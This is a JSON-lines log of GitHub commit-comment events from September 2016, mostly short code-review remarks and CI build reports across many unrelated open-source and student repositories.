{"id":"4509397805","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18882792,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:14:02Z","updated_at":"2016-09-02T16:14:02Z","body":"Okay I see, it starts to work once you're inside of a controller. Let me re-evaluate. I still think there's a cleaner way to do this"}},"created_at":"2016-09-02T16:14:02Z"}
{"id":"4509398966","type":"CommitCommentEvent","actor":{"login":"ZigaByte"},"repo":{"name":"Jeremy-Barnes/Critters"},"payload":{"comment":{"id":18882795,"position":14,"line":35,"path":"CritterGames/Breakout/core/src/com/critters/breakout/level/Level.java","commit_id":"f6370fe0998443fab8928b37d3851543628ebffc","created_at":"2016-09-02T16:14:17Z","updated_at":"2016-09-02T16:14:17Z","body":"I haven't thought about that. I will implement that"}},"created_at":"2016-09-02T16:14:17Z"}
{"id":"4509403082","type":"CommitCommentEvent","actor":{"login":"fkennedy"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18882802,"position":72,"line":72,"path":"lang/en_us/turnitintooltwo.php","commit_id":"f04888288ff897937db6aac341d855052c4d05df","created_at":"2016-09-02T16:15:09Z","updated_at":"2016-09-02T16:15:09Z","body":"should the p in \"part\" be capitalized just like the strings (Part has a capital p) above?"}},"created_at":"2016-09-02T16:15:09Z"}
{"id":"4509404807","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18882807,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T16:15:29Z","updated_at":"2016-09-02T16:15:29Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2367 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T16:15:29Z"}
{"id":"4509409358","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18882815,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T16:16:27Z","updated_at":"2016-09-02T16:16:27Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T16:16:27Z"}
{"id":"4509409892","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"HenriqueMaiani/EDL"},"payload":{"comment":{"id":18882817,"position":null,"line":null,"path":null,"commit_id":"18e0f6ee141457da76b9cc9e4bef9b2dac472875","created_at":"2016-09-02T16:16:34Z","updated_at":"2016-09-02T16:16:34Z","body":"Faltou colocar o texto no formato Markdown:\r\nhttps://en.wikipedia.org/wiki/Markdown#Example"}},"created_at":"2016-09-02T16:16:34Z"}
{"id":"4509410030","type":"CommitCommentEvent","actor":{"login":"battlemidget"},"repo":{"name":"Ubuntu-Solutions-Engineering/openstack-installer"},"payload":{"comment":{"id":18882819,"position":null,"line":null,"path":null,"commit_id":"a9af5234af7e9212d60a2c6c1f613824f759fddf","created_at":"2016-09-02T16:16:36Z","updated_at":"2016-09-02T16:16:36Z","body":"Should be available in ppa:cloud-installer/experimental, usually commits to master get built by the next day in that ppa"}},"created_at":"2016-09-02T16:16:36Z"}
{"id":"4509411795","type":"CommitCommentEvent","actor":{"login":"blackvkng"},"repo":{"name":"blackvkng/TurkHackTeam-Flooder"},"payload":{"comment":{"id":18882821,"position":null,"line":null,"path":null,"commit_id":"58bb8fe1564159c1655896bde27ba5b169ac297b","created_at":"2016-09-02T16:16:59Z","updated_at":"2016-09-02T16:16:59Z","body":"README.md"}},"created_at":"2016-09-02T16:16:59Z"}
{"id":"4509412989","type":"CommitCommentEvent","actor":{"login":"jmcc0nn3ll"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":18882826,"position":5,"line":88,"path":"jetty-documentation/pom.xml","commit_id":"d3f725637cf50c4d7cecca813ddee67ef0226cab","created_at":"2016-09-02T16:17:15Z","updated_at":"2016-09-02T16:17:15Z","body":"leaving a note here for posterity, seems that they changed the location that the html would generate to in 2.0.16 which broke the rendered html and the assembly which cascaded through the eclipse website\r\n\r\nit is all fixed now but fair warning if this plugin has a bug that gets fixed related to render locations then we might need to come back and adjust it back"}},"created_at":"2016-09-02T16:17:15Z"}
{"id":"4509413061","type":"CommitCommentEvent","actor":{"login":"wch"},"repo":{"name":"rstudio/shiny"},"payload":{"comment":{"id":18882827,"position":null,"line":null,"path":null,"commit_id":"1ff52c529076c5bf6d2dcfa1a232eace8bfbbaee","created_at":"2016-09-02T16:17:16Z","updated_at":"2016-09-02T16:17:16Z","body":"In the future, could you rebase the commit (9f68be1) onto master, instead of adding the extra merge commit? You can do a `git pull --rebase` to accomplish this. The regular `git pull` might ask you to make the merge commit -- in those cases I usually abort the merge commit, then do a `git pull --rebase`, or else do `git fetch` and then merge/rebase separately."}},"created_at":"2016-09-02T16:17:16Z"}
{"id":"4509413858","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"HenriqueMaiani/EDL"},"payload":{"comment":{"id":18882831,"position":null,"line":null,"path":null,"commit_id":"6ddd24261a081af9f1ab4c6f6b75ecba3a6b59f1","created_at":"2016-09-02T16:17:27Z","updated_at":"2016-09-02T16:17:27Z","body":"Mesma coisa. Formato markdown."}},"created_at":"2016-09-02T16:17:27Z"}
{"id":"4509417356","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882840,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:18:13Z","updated_at":"2016-09-02T16:18:13Z","body":" @punisher_b0t"}},"created_at":"2016-09-02T16:18:13Z"}
{"id":"4509418531","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882846,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:18:28Z","updated_at":"2016-09-02T16:18:28Z","body":"رطز\r\n\r\nبی\r\nریبی\r\nریری\r\nررببر\r\nریررب\r\nرببریبر\r\nیریبرر"}},"created_at":"2016-09-02T16:18:28Z"}
{"id":"4509423066","type":"CommitCommentEvent","actor":{"login":"luanguimaraesla"},"repo":{"name":"lappis-tools/chef-lappis"},"payload":{"comment":{"id":18882859,"position":null,"line":null,"path":null,"commit_id":"0d7ddd953f53e3634a4b1db3ed1b616c2b80bb69","created_at":"2016-09-02T16:19:25Z","updated_at":"2016-09-02T16:19:25Z","body":"Good job!"}},"created_at":"2016-09-02T16:19:25Z"}
{"id":"4509424424","type":"CommitCommentEvent","actor":{"login":"adadgio"},"repo":{"name":"adadgio/safari-reader-js"},"payload":{"comment":{"id":18882869,"position":null,"line":null,"path":null,"commit_id":"3219c45ce28e94898a126e6ff1a7c64ac793c257","created_at":"2016-09-02T16:19:43Z","updated_at":"2016-09-02T16:19:43Z","body":"Can you also commit those changes to the other two files please ? :-)"}},"created_at":"2016-09-02T16:19:43Z"}
{"id":"4509425229","type":"CommitCommentEvent","actor":{"login":"posborne"},"repo":{"name":"rust-embedded/meta-rust-bin"},"payload":{"comment":{"id":18882877,"position":42,"line":42,"path":"classes/cargo.bbclass","commit_id":"62d54f25a54831014ef61740f9f33dba4b0b5ffa","created_at":"2016-09-02T16:19:56Z","updated_at":"2016-09-02T16:19:56Z","body":"As you have encountered before, probably want to add some way to customize this in order to add feature flags or other options as required."}},"created_at":"2016-09-02T16:19:56Z"}
{"id":"4509425770","type":"CommitCommentEvent","actor":{"login":"Bezier89"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":18882879,"position":null,"line":null,"path":null,"commit_id":"cfe05dfda3ba79aa1bd3acce6b4e766eb7b9bc00","created_at":"2016-09-02T16:20:03Z","updated_at":"2016-09-02T16:20:03Z","body":"Throwing in my two cents since they differ a little from jrtom's (but luckily we reached the same conclusion!) regarding ValueGraph.\r\n\r\nWe did not go with \"WeightedGraph\" or the like because, as he mentioned, that has too strong a connotation with numeric values (certainly a legitimate use case, but not the only one). Personally I think \"label\" would have been appropriate, but just saying \"LabeledGraph\" implies that the *nodes* are labeled (which is always true in our case). As you said, we'd have to go with something like \"EdgeLabeledGraph\", which is quite a mouthful. Plus there's the whole \"labeled\" vs \"labelled\" thing on the spelling side of things.\r\n\r\n\"Value\" we felt had the right connotation here, and hopefully helps to distinguish it's use case from the Network interface."}},"created_at":"2016-09-02T16:20:03Z"}
{"id":"4509427044","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882886,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T16:20:21Z","updated_at":"2016-09-02T16:20:21Z","body":"Не очень понял как это: заменить пробелы на переносы?"}},"created_at":"2016-09-02T16:20:21Z"}
{"id":"4509429543","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18882899,"position":14,"line":0,"path":"app/src/main/java/com/ruesga/rview/ChangeDetailsActivity.java","commit_id":"5870605d5f478a4a845995d900561bf461887f50","created_at":"2016-09-02T16:20:53Z","updated_at":"2016-09-02T16:20:53Z","body":"Done"}},"created_at":"2016-09-02T16:20:53Z"}
{"id":"4509432351","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18882907,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:21:27Z","updated_at":"2016-09-02T16:21:27Z","body":"More generally: it works after a `$timeout`, doesn't have anything to do with controller"}},"created_at":"2016-09-02T16:21:27Z"}
{"id":"4509432437","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"KashaevaDasha/work"},"payload":{"comment":{"id":18882909,"position":12,"line":12,"path":"index.html","commit_id":"39017a148935512de6c4cc0d7930a403d315a640","created_at":"2016-09-02T16:21:28Z","updated_at":"2016-09-02T16:21:28Z","body":"tooooooo much spaces >__<"}},"created_at":"2016-09-02T16:21:28Z"}
{"id":"4509432460","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882910,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:21:28Z","updated_at":"2016-09-02T16:21:28Z","body":"@punisherbot "}},"created_at":"2016-09-02T16:21:28Z"}
{"id":"4509433121","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18882911,"position":42,"line":0,"path":"app/src/main/java/com/ruesga/rview/fragments/ChangeDetailsFragment.java","commit_id":"5870605d5f478a4a845995d900561bf461887f50","created_at":"2016-09-02T16:21:34Z","updated_at":"2016-09-02T16:21:34Z","body":"Done"}},"created_at":"2016-09-02T16:21:34Z"}
{"id":"4509433284","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18882912,"position":null,"line":null,"path":null,"commit_id":"a33395fb0c927287bede6f8b773c678a9e0d81a7","created_at":"2016-09-02T16:21:36Z","updated_at":"2016-09-02T16:21:36Z","body":"See #4572"}},"created_at":"2016-09-02T16:21:36Z"}
{"id":"4509433682","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":18882913,"position":null,"line":null,"path":null,"commit_id":"565496e79809b0c6eae83bc1c9107e834d82bd4e","created_at":"2016-09-02T16:21:40Z","updated_at":"2016-09-02T16:21:40Z","body":"Em \"Código representativo\" você usar códigos que usem características interessantes em comparação a outras linguagens."}},"created_at":"2016-09-02T16:21:40Z"}
{"id":"4509434413","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18882916,"position":null,"line":null,"path":null,"commit_id":"ba6e2f2f35a8848568e401a18fe08275cc7cd603","created_at":"2016-09-02T16:21:50Z","updated_at":"2016-09-02T16:21:50Z","body":"See #See #4572"}},"created_at":"2016-09-02T16:21:50Z"}
{"id":"4509435435","type":"CommitCommentEvent","actor":{"login":"sevu"},"repo":{"name":"ProditorMagnus/Ageless-for-1-11"},"payload":{"comment":{"id":18882918,"position":null,"line":null,"path":null,"commit_id":"d5d8bfdabf77de3c225a28a32e5e52ce6bb1c2d4","created_at":"2016-09-02T16:22:04Z","updated_at":"2016-09-02T16:22:04Z","body":"Yes, this wouldn't have been a good idea."}},"created_at":"2016-09-02T16:22:04Z"}
{"id":"4509436918","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18882920,"position":null,"line":null,"path":null,"commit_id":"c633cc1a92328cc64daa0f5cc996fae423703e0a","created_at":"2016-09-02T16:22:22Z","updated_at":"2016-09-02T16:22:22Z","body":"See #4572"}},"created_at":"2016-09-02T16:22:22Z"}
{"id":"4509438237","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18882928,"position":null,"line":null,"path":null,"commit_id":"947960517ee1baadea40dadc11422bca614c5beb","created_at":"2016-09-02T16:22:38Z","updated_at":"2016-09-02T16:22:38Z","body":"See #4572"}},"created_at":"2016-09-02T16:22:38Z"}
{"id":"4509439002","type":"CommitCommentEvent","actor":{"login":"emoose"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18882930,"position":11,"line":11,"path":"MBINCompiler/Models/Structs/Unfinished/GcSceneOptions.cs","commit_id":"b2f3d7e4a433ae5ebeb97233fe2c44937393309d","created_at":"2016-09-02T16:22:48Z","updated_at":"2016-09-02T16:22:48Z","body":"Yeah there's usually code for adding the 0/null terminator byte, in this template it seems to set another byte after it though, not 100% sure if its correct since there's no code that actually uses these fields afaik, just code for setting the defaults. The files mentioned in here (SUPERBIOME.MXML and DESERTBIOME.MXML) don't seem to exist neither, so I guess GcSceneOptions is from earlier in development."}},"created_at":"2016-09-02T16:22:48Z"}
{"id":"4509439251","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18882932,"position":null,"line":null,"path":null,"commit_id":"b335e009b869df4f668699d36d066a6fca55005b","created_at":"2016-09-02T16:22:52Z","updated_at":"2016-09-02T16:22:52Z","body":"See #4572"}},"created_at":"2016-09-02T16:22:52Z"}
{"id":"4509440217","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18882935,"position":null,"line":null,"path":null,"commit_id":"7ed2ff7159483eb90fd8ee7d2533fe9aa6aaec93","created_at":"2016-09-02T16:23:06Z","updated_at":"2016-09-02T16:23:06Z","body":"See #4572"}},"created_at":"2016-09-02T16:23:06Z"}
{"id":"4509440687","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Rafaustino/EDL"},"payload":{"comment":{"id":18882938,"position":null,"line":null,"path":null,"commit_id":"7be4e1fb01c60cfb6e855effd4c99dafd622613d","created_at":"2016-09-02T16:23:11Z","updated_at":"2016-09-02T16:23:11Z","body":"Favor colocar no diretório trabalho-02"}},"created_at":"2016-09-02T16:23:11Z"}
{"id":"4509440900","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882939,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:23:15Z","updated_at":"2016-09-02T16:23:15Z","body":" @punisher_b0t"}},"created_at":"2016-09-02T16:23:15Z"}
{"id":"4509441303","type":"CommitCommentEvent","actor":{"login":"NealJMD"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":18882945,"position":11,"line":11,"path":"app/services/manage_survey_response.rb","commit_id":"221ed3da968ea8a1cdd4e1f1fe284e196a5a0ea3","created_at":"2016-09-02T16:23:20Z","updated_at":"2016-09-02T16:23:20Z","body":"this could be rather more concise\r\n```\r\nupdate_action! if validator.valid?\r\nvalidator.valid?\r\n```"}},"created_at":"2016-09-02T16:23:20Z"}
{"id":"4509442832","type":"CommitCommentEvent","actor":{"login":"KirDE"},"repo":{"name":"catfan/Medoo"},"payload":{"comment":{"id":18882950,"position":null,"line":null,"path":null,"commit_id":"e893cb203e9fce866317571c59372ba5d5917ebc","created_at":"2016-09-02T16:23:39Z","updated_at":"2016-09-02T16:23:39Z","body":"why it was removed? now it is not possible again to use LIKE 'Lon%' //London, Londox ..."}},"created_at":"2016-09-02T16:23:39Z"}
{"id":"4509446354","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882955,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:24:21Z","updated_at":"2016-09-02T16:24:21Z","body":"@punisher_bot "}},"created_at":"2016-09-02T16:24:21Z"}
{"id":"4509447261","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882959,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:24:31Z","updated_at":"2016-09-02T16:24:31Z","body":"@punisherbot "}},"created_at":"2016-09-02T16:24:31Z"}
{"id":"4509448441","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"KashaevaDasha/work"},"payload":{"comment":{"id":18882961,"position":57,"line":57,"path":"main.js","commit_id":"39017a148935512de6c4cc0d7930a403d315a640","created_at":"2016-09-02T16:24:46Z","updated_at":"2016-09-02T16:24:46Z","body":"ты можешь завернуть создание лишек в цикл например и либо рушить их в массив или еще лучше - в объект. например создаешь объект\r\nvar lis = {\r\n  summary: null,\r\n  img: null,\r\n  price: null\r\n};\r\n\r\nа потом фор ин, а в фор ине создаешь лизу и присваиваешь в свойство объекта ;)"}},"created_at":"2016-09-02T16:24:46Z"}
{"id":"4509451524","type":"CommitCommentEvent","actor":{"login":"CaptainTK"},"repo":{"name":"vonH/plugin.video.iplayerwww"},"payload":{"comment":{"id":18882966,"position":null,"line":null,"path":null,"commit_id":"8f9ce19c413677bc093e38419f2642c0478661f9","created_at":"2016-09-02T16:25:27Z","updated_at":"2016-09-02T16:25:27Z","body":"You should switch your spell-checker to real (British) English. ;-)\r\n\r\nI don't get your point regariding the verb, though. What did I miss?"}},"created_at":"2016-09-02T16:25:27Z"}
{"id":"4509451770","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18882968,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T16:25:30Z","updated_at":"2016-09-02T16:25:30Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-02T16:25:30Z"}
{"id":"4509454699","type":"CommitCommentEvent","actor":{"login":"fkennedy"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18882975,"position":7,"line":56,"path":"sass/partials/_table.scss","commit_id":"f04888288ff897937db6aac341d855052c4d05df","created_at":"2016-09-02T16:26:09Z","updated_at":"2016-09-02T16:26:09Z","body":"Fix indentation."}},"created_at":"2016-09-02T16:26:09Z"}
{"id":"4509458010","type":"CommitCommentEvent","actor":{"login":"fkennedy"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18882982,"position":30,"line":1889,"path":"turnitintooltwo_assignment.class.php","commit_id":"f04888288ff897937db6aac341d855052c4d05df","created_at":"2016-09-02T16:26:50Z","updated_at":"2016-09-02T16:26:50Z","body":"Fix indentation."}},"created_at":"2016-09-02T16:26:50Z"}
{"id":"4509463678","type":"CommitCommentEvent","actor":{"login":"rodrei"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":18882992,"position":11,"line":11,"path":"app/services/manage_survey_response.rb","commit_id":"221ed3da968ea8a1cdd4e1f1fe284e196a5a0ea3","created_at":"2016-09-02T16:27:57Z","updated_at":"2016-09-02T16:27:57Z","body":"+1\r\n"}},"created_at":"2016-09-02T16:27:57Z"}
{"id":"4509463705","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18882993,"position":41,"line":51,"path":"emulator/lib/src/memory/rom_new.dart","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:27:57Z","updated_at":"2016-09-02T16:27:57Z","body":"`Uint8List   pull8List(int romAddr, int len)` to `Uint8List   pull8View(int romAddr, int len)` ?"}},"created_at":"2016-09-02T16:27:57Z"}
{"id":"4509463708","type":"CommitCommentEvent","actor":{"login":"fkennedy"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18882994,"position":90,"line":1939,"path":"turnitintooltwo_view.class.php","commit_id":"f04888288ff897937db6aac341d855052c4d05df","created_at":"2016-09-02T16:27:57Z","updated_at":"2016-09-02T16:27:57Z","body":"Fix indentation for lines 1938-1939."}},"created_at":"2016-09-02T16:27:57Z"}
{"id":"4509466139","type":"CommitCommentEvent","actor":{"login":"EskelCz"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18882997,"position":null,"line":null,"path":null,"commit_id":"37a0af9f0efca8027ca8407b14b3781edf57dbaf","created_at":"2016-09-02T16:28:25Z","updated_at":"2016-09-02T16:28:25Z","body":"@spidersharma03 This is awesome. But what about animated models? Can this be update to outline skinned meshes as well? I'd like to use it in a game engine for character models and right now it outlines their T-poses. Not very useful. :)\r\n\r\nI've made my own solution earlier but yours is more complex, except this issue. Maybe I can help to fix it, if you can point me into right direction.\r\n\r\nThis was my approach: http://stackoverflow.com/questions/23245748/uniform-vertex-displacement-for-skinned-mesh-shader-animated-outline-three-js/23253396"}},"created_at":"2016-09-02T16:28:25Z"}
{"id":"4509466733","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883000,"position":24,"line":26,"path":"emulator/lib/src/memory/rom_new.dart","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:28:34Z","updated_at":"2016-09-02T16:28:34Z","body":"`extends` to `implements` "}},"created_at":"2016-09-02T16:28:34Z"}
{"id":"4509470428","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883010,"position":208,"line":334,"path":"emulator/lib/src/memory/rom_header_new.dart","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:29:24Z","updated_at":"2016-09-02T16:29:24Z","body":"will be fixed"}},"created_at":"2016-09-02T16:29:24Z"}
{"id":"4509472207","type":"CommitCommentEvent","actor":{"login":"lucyking"},"repo":{"name":"lucyking/leetcode"},"payload":{"comment":{"id":18883015,"position":null,"line":null,"path":null,"commit_id":"59e6cc25800dc62530c0e52553edfa2bb6c6723a","created_at":"2016-09-02T16:29:46Z","updated_at":"2016-09-02T16:29:46Z","body":"### dict\r\ndict.get(key,0):\r\n    return (key in dict) ? key_value : 0\r\n\r\n### string[n,m]\r\nreturn s[n]~s[**m-1**] , so if you want s[n]~s[m] ,using s[n:**m+1**]\r\n\r\n### ord <-> bin oct hex\r\nto number <-> to string"}},"created_at":"2016-09-02T16:29:46Z"}
{"id":"4509472364","type":"CommitCommentEvent","actor":{"login":"fpetric"},"repo":{"name":"larics/nao-object-gesture"},"payload":{"comment":{"id":18883016,"position":null,"line":null,"path":null,"commit_id":"166c7ca8674103b3ceba2104486d1a30bb726761","created_at":"2016-09-02T16:29:48Z","updated_at":"2016-09-02T16:29:48Z","body":"Along with the changes in the source files indicated in the commit, in order to compile the library, one needs to hotfix the noncopyable.hpp file in the include folder of the cross-compilation SDK. (/<sdk-folder>/ctc-linux64-atom-x.x.x.x/boost/include/boost-1_55/boost/noncopyable.hpp).\r\nThe fix is in the line 26 of noncopyable.hpp:\r\n`#ifndef BOOST_NO_DEFAULTED_FUNCTIONS`\r\nwhich needs to be replaced with \r\n`#if !defined(BOOST_NO_DEFAULTED_FUNCTIONS) && !defined(BOOST_NO_CXX11_NON_PUBLIC_DEFAULTED_FUNCTIONS)`\r\n\r\nThis resolves the issue when the non-public member is defaulted in the class body. See here:\r\nhttp://lists.boost.org/Archives/boost/2014/04/212515.php \r\n\r\nReplacement of c++0x flag with gnu++0x is to fix issues which libqi has with c11, as per these instructions:\r\nhttps://github.com/aldebaran/libqi/issues/1\r\n\r\nOther fixes are straightforward and due to changes in the boost API when upgrading from boost-1.48 (naoqi ver. 1.14) to boost-1.55 (naoqi ver 2.1.x)"}},"created_at":"2016-09-02T16:29:48Z"}
{"id":"4509473340","type":"CommitCommentEvent","actor":{"login":"rqc"},"repo":{"name":"eedevops/he-auth-service"},"payload":{"comment":{"id":18883019,"position":7,"line":2,"path":".dockerignore","commit_id":"34ba6e14301cf0f71e9dc41d2ca9a8aab47a3cc0","created_at":"2016-09-02T16:30:00Z","updated_at":"2016-09-02T16:30:00Z","body":"seems to be missing the newline again"}},"created_at":"2016-09-02T16:30:00Z"}
{"id":"4509474147","type":"CommitCommentEvent","actor":{"login":"rqc"},"repo":{"name":"eedevops/he-auth-service"},"payload":{"comment":{"id":18883021,"position":6,"line":4,"path":".gitignore","commit_id":"34ba6e14301cf0f71e9dc41d2ca9a8aab47a3cc0","created_at":"2016-09-02T16:30:13Z","updated_at":"2016-09-02T16:30:13Z","body":"seems to be missing the newline"}},"created_at":"2016-09-02T16:30:13Z"}
{"id":"4509475261","type":"CommitCommentEvent","actor":{"login":"rqc"},"repo":{"name":"eedevops/he-auth-service"},"payload":{"comment":{"id":18883026,"position":6,"line":4,"path":"README.md","commit_id":"34ba6e14301cf0f71e9dc41d2ca9a8aab47a3cc0","created_at":"2016-09-02T16:30:26Z","updated_at":"2016-09-02T16:30:26Z","body":"👍 "}},"created_at":"2016-09-02T16:30:26Z"}
{"id":"4509476305","type":"CommitCommentEvent","actor":{"login":"rqc"},"repo":{"name":"eedevops/he-auth-service"},"payload":{"comment":{"id":18883029,"position":6,"line":5,"path":"app/routes/test.es6","commit_id":"34ba6e14301cf0f71e9dc41d2ca9a8aab47a3cc0","created_at":"2016-09-02T16:30:39Z","updated_at":"2016-09-02T16:30:39Z","body":"👍 \r\n"}},"created_at":"2016-09-02T16:30:39Z"}
{"id":"4509477804","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18883032,"position":9,"line":60,"path":"webapp/src/simulator.ts","commit_id":"1958df75c038cc89f266a2a982524e447848c2fd","created_at":"2016-09-02T16:30:56Z","updated_at":"2016-09-02T16:30:56Z","body":"This is where we need to plug in editor support for #31 "}},"created_at":"2016-09-02T16:30:56Z"}
